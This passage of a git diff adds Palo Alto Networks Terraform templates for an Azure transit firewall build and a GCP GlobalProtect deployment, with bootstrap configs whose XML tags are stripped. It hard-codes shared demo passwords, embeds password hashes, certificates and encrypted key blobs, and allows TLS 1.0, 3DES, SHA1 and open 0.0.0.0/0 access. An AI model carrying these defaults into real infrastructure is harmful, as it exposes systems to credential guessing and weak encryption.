route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} + +module "spoke2_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke2_prefix}-vm" + vm_count = var.spoke2_vm_count + subnet_id = module.spoke2_vnet.vnet_subnets[0] + availability_set_id = "" + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} diff --git a/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars new file mode 100644 index 00000000..3304b1e6 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars @@ -0,0 +1,43 @@ +#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode +#fw_license = "bundle1" +#fw_license = "bundle2" + +global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription +location = "centralus" + +# ----------------------------------------------------------------------- +# VM-Series resource group variables + +fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group +fw_count = 2 +fw_panos = "9.0.1" +fw_nsg_prefix = "0.0.0.0/0" +fw_username = "paloalto" +fw_password = "Pal0Alt0@123" +fw_internal_lb_ip = "10.0.2.100" + +# ----------------------------------------------------------------------- +# Transit resource group variables + +transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group +transit_vnet_cidr = "10.0.0.0/16" +transit_subnet_names = ["mgmt", "untrust", "trust","gateway"] +transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + +# ----------------------------------------------------------------------- +# Spoke resource group variables + +spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group +spoke1_vm_count = 2 +spoke1_vnet_cidr = "10.1.0.0/16" +spoke1_subnet_cidrs = ["10.1.0.0/24"] +spoke1_internal_lb_ip = "10.1.0.100" + +spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group +spoke2_vm_count = 1 +spoke2_vnet_cidr = "10.2.0.0/16" +spoke2_subnet_cidrs = ["10.2.0.0/24"] + +spoke_username = "paloalto" +spoke_password = "Pal0Alt0@123" +spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"] diff --git a/azure/transit_2fw_2spoke_common_appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/variables.tf new file mode 100644 index 00000000..4899c169 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/variables.tf @@ -0,0 +1,129 @@ +variable location { + description = "Enter a location" +} + +variable fw_prefix { + description = "Prefix to add to all resources added in the firewall resource group" + default = "" +} + +variable fw_license { + description = "VM-Series license: byol, bundle1, or bundle2" + # default = "byol" + # default = "bundle1" + # default = "bundle2" +} + +variable global_prefix { + description = "Prefix to add to all resource groups created. 
This is useful to create unique resource groups within a shared Azure subscription" +} +#----------------------------------------------------------------------------------------------------------------- +# Transit VNET variables + +variable transit_prefix { +} + +variable transit_vnet_cidr { +} + +variable transit_subnet_names { + type = list(string) +} + +variable transit_subnet_cidrs { + type = list(string) +} + +#----------------------------------------------------------------------------------------------------------------- +# VM-Series variables + +variable fw_count { +} + +variable fw_nsg_prefix { +} + +variable fw_panos { +} + +variable fw_username { +} + +variable fw_password { +} + +variable fw_internal_lb_ip { +} + +#----------------------------------------------------------------------------------------------------------------- +# Spoke variables + +variable spoke_username { +} + +variable spoke_password { +} + +variable spoke_udrs { +} + +variable spoke1_prefix { + description = "Prefix to add to all resources added in spoke1's resource group" +} + +variable spoke1_vm_count { +} + +variable spoke1_vnet_cidr { +} + +variable spoke1_subnet_cidrs { + type = list(string) +} + +variable spoke1_internal_lb_ip { +} + +variable spoke2_prefix { + description = "Prefix to add to all resources added in spoke2's resource group" +} + +variable spoke2_vm_count { +} + +variable spoke2_vnet_cidr { +} + +variable spoke2_subnet_cidrs { + type = list(string) +} + +variable tags { + description = "The tags to associate with newly created resources" + type = map(string) + + default = {} +} + +#----------------------------------------------------------------------------------------------------------------- +# Azure environment variables + +variable client_id { + description = "Azure client ID" + default = "" +} + +variable client_secret { + description = "Azure client secret" + default = "" +} + +variable subscription_id { + description = "Azure subscription ID" + default = "" +} + +variable tenant_id { + description = "Azure tenant ID" + default = "" +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/Guide.pdf b/gcp/GP-NoAutoScaling/Guide.pdf new file mode 100644 index 00000000..8b294c36 Binary files /dev/null and b/gcp/GP-NoAutoScaling/Guide.pdf differ diff --git a/gcp/GP-NoAutoScaling/README.md b/gcp/GP-NoAutoScaling/README.md new file mode 100644 index 00000000..e140aa27 --- /dev/null +++ b/gcp/GP-NoAutoScaling/README.md @@ -0,0 +1,51 @@ +# GlobalProtect in GCP + +Terraform creates a basic GlobalProtect infrastructure consisting of 1 Portal and 2 Gateways (in separate Zones) along with two test Ubuntu servers. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/GP-NoAutoScaling/GUIDE.pdf) for more information. + +
+

+ +

+ + +## Prerequisites +* Valid GCP Account with existing project +* Access to GCP Cloud Shell or to a machine with a Terraform 0.12 installation + +
+ +## How to Deploy +### 1. Setup & Download Build +In your project, open GCP Cloud Shell and run the following. +``` +$ gcloud services enable compute.googleapis.com +$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo +$ git clone https://github.com/wwce/terraform; cd terraform/gcp/GP-NoAutoScaling +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and edit variables (lines 1-4) to match your Billing ID, Project Base Name, SSH Key (from step 1), and Region (an illustrative excerpt follows this section). + + +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
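The GP-NoAutoScaling terraform.tfvars is not included in this diff, so the variable names on lines 1-4 are not visible here. Treat the snippet below as a hypothetical illustration of the four values step 2 asks for; apart from GCP_Region (referenced as var.GCP_Region in bootstrap-gateway.tf), every name and value is an assumption to be checked against the file that ships with the build.

```
# Hypothetical names except GCP_Region (used as var.GCP_Region elsewhere in this build).
billing_account   = "012345-6789AB-CDEF01"   # your GCP Billing ID
project_base_name = "gp-demo"                # base name for the new project
public_key_path   = "~/.ssh/gcp-demo.pub"    # public half of the key generated in step 1
GCP_Region        = "us-east1"
```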
+ +## How to Destroy +Run the following to destroy the build and remove the SSH key created in step 1. +``` +$ terraform destroy +$ rm ~/.ssh/gcp-demo* +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway.tf b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf new file mode 100644 index 00000000..d5249b81 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf @@ -0,0 +1,31 @@ +resource "google_storage_bucket" "gateway_bucket" { + name = "gateway-${random_id.random_number.hex}" + storage_class = "REGIONAL" + location = var.GCP_Region + project = google_project.globalprotect.number +} +resource "google_storage_bucket_object" "gateway_bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap-gateway/bootstrap.xml" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap-gateway/init-cfg.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_content" { + name = "content/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_software" { + name = "software/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_license" { + name = "license/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml new file mode 100644 index 00000000..6da28cec --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml @@ -0,0 +1,647 @@ + + + + + + + + yes + + + $1$afhulhyx$P9pkv4/MiYY070qlWmN.v0 + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + a0cb01b7 + e8d8421e + Mar 24 17:02:26 2020 GMT + /CN=GP-CA + Mar 24 17:02:26 2021 GMT + dummy-gw-cert + 1616605346 + no + 
/CN=dummy-gw-cert + -----BEGIN CERTIFICATE----- +MIIDFDCCAfygAwIBAgIFAIsWwrMwDQYJKoZIhvcNAQELBQAwEDEOMAwGA1UEAxMF +R1AtQ0EwHhcNMjAwMzI0MTcwMjI2WhcNMjEwMzI0MTcwMjI2WjAYMRYwFAYDVQQD +Ew1kdW1teS1ndy1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA +stP0zbfGt7hagWFqN1AD8HsQC1MtPNJRif9TCdskkm15k4nNQmk17ynuXKQNolBB +hoT+HyUN3AISxJ59QiEuwM0ZSta8PeYrgRSs1fFBWYx1o8Iel9uIGVt+wA81bgau +fNa1xkKjEDf/9gUoIS/pshitwxzmdp9b5EAgP6AnMfvHQynITzE1hxB9vTh0V8kW +glQ8H6s0PkxUaLoHmNhjj3Zwcg7FdiIgzJGOKK6fo/89Mc4BnqNLNqlvqzJC5meT +hdiZFwn/8O9urfKFRp36ZUp+FDHSYIhATiW1MhyiAEfxvjtTeNT9nffhDTC+obJO +lUSkc3fkuqnQ4pJH/29/LQIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQEAwID +uDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkGA1Ud +IwQCMAAwHQYDVR0OBBYEFD+qH0n0MvDc7amKUccXYBTXYMfMMA0GCSqGSIb3DQEB +CwUAA4IBAQB3R44cMm/JqxiXoId8/7oFb9WfBrkBV77QXg9aDec34x4PjEYbRpDb +9S+WFhWAG344MHluqsZuJF8PLtLSruNSfw4wxymMnHTKvn6yUT9o1Kseh/iRtFW4 +Oyog93g29rnqfVnJ1IslkgIdSB+LeW1wjOvIYcAfRQj0qFp4RK9esoJG4vvDTDI5 +BsmRqxR3aa9BY74wZMrnG5xby+Eyfo6RXzmjuR765yRO5HQSGQQhkKa+OhjkXrKA +KlciqAIoD2NIusdlPUJtlyG0TKgq859+dICv2QTGxvT6YYt0eMR/85q/M1ydEiPd +G4K6WWOKEwaJ5f9vyjCOTi42OJFzSOZq +-----END CERTIFICATE----- + + RSA + -AQ==upj09hPum45JJ00xXyKBB3Q5ZeY=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 + + + e8d8421e + e8d8421e + Mar 24 17:00:47 2020 GMT + /CN=GP-CA + Mar 24 17:00:47 2021 GMT + GP-CA + 
1616605247 + yes + /CN=GP-CA + -----BEGIN CERTIFICATE----- +MIICwDCCAaigAwIBAgIJAMn5gXdRd5x1MA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV +BAMTBUdQLUNBMB4XDTIwMDMyNDE3MDA0N1oXDTIxMDMyNDE3MDA0N1owEDEOMAwG +A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBGFGm +/Z+y3AcfqmxOn4RJwF7tA7bh1usgi7nZF5/JELLr0fSXvDqk41pT0Kzm3GWcdZ8b +4kV1aLNfxWleozPGL4Ezl7z4xkc0kcntK3VpkK4+6/16hZBuQF9roqB0my1HlfRG +eWBf7bye4ARqmiENuSC5YphS4KJOSoZ4h52hcSsXAcmD+FmtoOtckkvEl5TBhMQX +Gt4N4FOsuUszQtbql6xNDAFmdXc4YajUVkUM3CRcMTRO+A2YbbRzvwUnGA3wueBb +1C5JQGHd/lTzbEgTmeRDHvIyx8sruMOuYPQbg8d3JxGT6MZcXRCAJHCpWSXg3WZd +vBoHuk/ZWNKqdMUPAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE +MA0GCSqGSIb3DQEBCwUAA4IBAQB+eexIJn99kuJpWAVyh/W+pT1Ah52S8fQi/GJc +DfxELZqsIg7VkkcZFZJ2aefQpoHp4avKyreUsAG6PnkR9DgNZVBJRe0PDxVf6C+T +1HvE863NThiRUJi3l1GMaI+xQPKg83ceRsqOAqMzYtf/Xq+/XaawCcBei/9bGqpr +AJHtvcgiO99yaQnu0hQ5K72Dn0v8ABbF6XyCSSuItdsaltS5XAlHp60+Mcq1R1eh +n01P4VF6sz5Qsdu49743ja4rd68E/Vd+SQoSroZArOwjLE+dNItiPwgL217HQQqx +6GgUahzsIr9nAQ59i6s3U4WY2bHZqL94GLdJfTq1dIyktMsz +-----END CERTIFICATE----- + + RSA + -AQ==Lw22pTLfVHUfvaPxm5QAxE/9jX4=wfL5Zc+wUAak+B7CnAVY6NdutYWtt67XvF+yGHFGS+v3hQ6NGerTNEn2/C/2TE21i7Y30DkK71PBtzbx6uj8HmXI7NZecoCmq/ifemD8h5NEiz8mIoh2ai3farhVRxqjU3RLHM9t2qD10XBXuyt/s8rqJUOAQnRQNFKPzQ1xnusR+7mg7ysVxXMIrxifWuJZfOQYHdeHPtP4PMwJmIBD5UD85Uaqo/qyoKdoDD55HTyInEndm690PMwCYOhUHrOz0FzWj67L++DH1ZUCW9L6VlkybcdA+IYevB2uoOPtxXkiSQ/XvyhZM8mo2B74M/lN+S17Pz85X5n2L/ddz+tMGwsDrcNK2thJsdw6CRrz2KoHoN7ypBCZU7zZTwPzOx559i1iTqaZcmprJivlUqi5D6yEd1znnoEWtxXrg+rnxHpjxNlwWIR/HuIPj4l8fnf7YtoqhGjz2FjGaCYBwif6iGXju/FSvAd0Vn0zCLOPoAvENRMQfZpjbg9UprVcbPusoxxCQ8w3y0gL4ioex8Wl8dqR2bf9Henf8CkzlrC9ZJNDWt/rbV5fv9ExbRNl9CD0zoex2/Fkth6KOA9dcFpXnmNgwymwhcjt/EQ3EYcAmGnnyTtotbiUUTptLzcomnPBkdVojD0CUrTseD6WirB5YUjmC/l2xADSoToABdMn0d5lqyfgcuzjQIlgV1sc5aE3sCQqoLa3rZCoXwDdCfLxsXo8wQQLJffqKBcQkMVMeyoAe3/wIaSO8p0aE7OOrRSVqfUwLZDqGhOMNZGjNjg4ke7gn6siwqwdQVkLyhRYkaUUd3K52/U5ldM2xv09va608AMgg+J8uAw/LBFqlB7GAQy2jLX+KF0OLhvOnDeJN2ljuJqovd+tOpnq+9KdPXYpcr+wSWTl2u/+dSPCUIn6I//czigZmxzjJiJf2Z5B1dduR5/kr92EdVZUY6/zZLW8Q1EyM7oDDDpUp56N9iqrQoQ4ebySO1IY2NsB4ClmH2coLDJ5Z4u1jsFmhOrw9oFUS17zcW6cw7MZIQovk/jCtapWN8B4NJDgnPMXJntJoHB3w4A7cGBh50uj8CAAS/Tm2B0noBj8mnYQOc9s/PgpI38sfFyYp5S6N8sZ68AfDKy7iLi/sHUlVYyYQunHknDWaOblejZlhWTA9tJ6/lpzl7p01BF7miMpqw77ZqMc4yV9ezzvNH2PE3jmO4POtexTsUXIIMMA7mj4MBzi5fNZ5T6M9XePFaVV60kr5JurD6qfUViPNthPigaKVhpimlF3MnQLUFFLITL3xClJ35cjCX25V94x30U4pN75Zb0EnqXd2h+1tmBg22zSKQBvl90knevLEFA4tDrJod3EfETZulp0eAD6VLXzV1B4rmatTCQYL//iKE2egQmQspfHASYtlK82ltUjnZ4Kbxju7KvbpOI8NPZEq+G3CfP29AggoeC1BD+KcrTWxv82B0Arwcv48+DMUBQYE8WQr+yI6BL9fhCA7aq6TyZW9WhVmovzLGu5x0uWRUa9GZw/Z4n+4ER/Fg79NhiAPryDwCYi/U7O0RzCMEwx1mfHaon50azUZTRJd8SCO1qBtkGGkaPFPfQVrpCX9S+COa+WVkeQ/vDMQjAPJqugn4h3W9o5IEXS4GVfmcttWWp9/5jMNws7u0P79guLAGgnBxUDGtQsqCJtYzEtOcF/wjxXS2RwejBZSi/YPp5dpl/mbTb2zQa7Q8w5gaE2hO2L8Wzs+L15HwmSro+/CfyiBRxzq0YxnRtLZL/eXguoQKQgOC2o6JjzTwuoQyAuJSXB08SdoEbaAYnEsLrowwOMT6djL4ATHgDRXLX6jDm78lmPtf/wQ1ZhR+41ZelV8HN3mCEz0VipzznFw18RklSf3krzRyz0XUziKEEnfdXU2JI4aiTIC4rsvNlGmSvlk2JE0uq6IE1BOobrpNZbnX6uzuCU/GqihknWafBsn1K9A//JFXZqVidSEHiFFgYs8JXqwk7Eo3mjL0+ldkI1rItzELohXCg5ibBtRjvkjWaG/pEaRjv6uZ1lAyc6RW9fNO30jEKuGyK0I7swl+dxpbeCtKXiGBsfZFcnIy8p+mdr+KoBp3i5/C8GWVyd5xaJZtS+9xD67rgDaIEhYS1fgTPtzwj62CHmR1ltaKts/Wdjk77JVn0pXcgQX8KWI9m4XZN4txygYxgIOij+pm6ekPi5wCuiemQ94fYYufj0viIlMjjxhEFi7j3TB2Ro + + + + + + tls1-0 + max + + dummy-gw-cert + + + + + + + + + all + + + + + + + $1$dwadmvhu$fzo/POkYDQ/Z/IKyLtmlX. 
+ + + $1$henwxpvq$KjL6f7B5gjVBDTEDT6pB6/ + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + ping + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + tunnel.1 + ethernet1/2 + + + + + + + + ipv4 + ethernet1/1 + + + + + no + + + tunnel.1 + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + yes + yes + yes + yes + + + FW-1 + yes + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + yes + yes + yes + yes + + + FW-1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + tunnel.1 + + + yes + + + + + ethernet1/2 + + + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + tunnel-zone + + + any + + + any + + any + no + + + + + + ethernet1/2 + + + + + trust + + + tunnel-zone + + + any + + + any + + any + + + + + + + + untrust + + + tunnel-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + yes + no + + + + trust + + + tunnel-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + + + + + + + + ethernet1/1 + tunnel.1 + ethernet1/2 + + + + + + + + + + 30 + + + 3 + + + 180 + + + + + + local + Any + Enter login credentials + + + gateway-ssl-tls + yes + + + + + + + any + + + any + + + 192.168.16.10-192.168.16.30 + + + no + no + + + tunnel.1 + + + + + + + + diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt new file mode 100644 index 00000000..3606b11c --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt @@ -0,0 +1,14 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal.tf b/gcp/GP-NoAutoScaling/bootstrap-portal.tf new file mode 100644 index 00000000..6f6dbe07 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal.tf @@ -0,0 +1,31 @@ +resource "google_storage_bucket" "portal_bucket" { + name = "portal-${random_id.random_number.hex}" + storage_class = 
"REGIONAL" + location = var.GCP_Region + project = google_project.globalprotect.number +} +resource "google_storage_bucket_object" "portal_bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap-portal/bootstrap.xml" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap-portal/init-cfg.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_content" { + name = "content/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_software" { + name = "software/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} +resource "google_storage_bucket_object" "portal_license" { + name = "license/null.txt" + source = "bootstrap-portal/null.txt" + bucket = google_storage_bucket.portal_bucket.name +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml new file mode 100644 index 00000000..181c989d --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml @@ -0,0 +1,2424 @@ + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + yes + yes + yes + yes + + + yes + FW-1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + yes + yes + yes + yes + + + FW-1 